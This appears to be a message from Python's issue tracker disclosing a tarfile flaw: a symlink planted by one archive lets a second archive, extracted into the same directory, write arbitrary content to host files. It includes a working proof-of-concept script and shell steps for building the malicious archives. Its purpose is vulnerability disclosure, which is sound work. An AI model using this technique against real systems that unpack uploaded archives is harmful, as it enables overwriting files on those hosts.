Message392827
if uncompress file twice to the same dir, attacker can "write any content to any file on the host"".
poc code like below:
```
import tarfile
dir_name = "/tmp/anything"
file1_name = "/tmp/a.tar.gz" # ln -sv /tmp/a test_tar/a;tar -cvf a.tar.gz test_tar/a
file2_name = "/tmp/b.tar.gz" # echo "it is just poc" > /tmp/payload; rm -rf test_tar; cp /tmp/payload test_tar/a;tar -cvf b.tar.gz test_tar/a
def vuln_tar(tar_path):
"""
:param tar_path:
:return:
"""
import tarfile
tar = tarfile.open(tar_path, "r:tar")
file_names = tar.getnames()
for file_name in file_names:
tar.extract(file_name, dir_name)
tar.close()
vuln_tar(file1_name)
vuln_tar(file2_name)
```
in this poc code, if one service uncompress tar file which is uploaded by attacker to "dir_name" twice, attacker can create "/tmp/a" and write "it is just poc" string into "/tmp/a" file. |
|
Date |
User |
Action |
Args |
2021-05-03 17:44:03 | leveryd | set | recipients:
+ leveryd |
2021-05-03 17:44:03 | leveryd | set | messageid: <1620063843.8.0.514260137969.issue44023@roundup.psfhosted.org> |
2021-05-03 17:44:03 | leveryd | link | issue44023 messages |
2021-05-03 17:44:03 | leveryd | create | |
|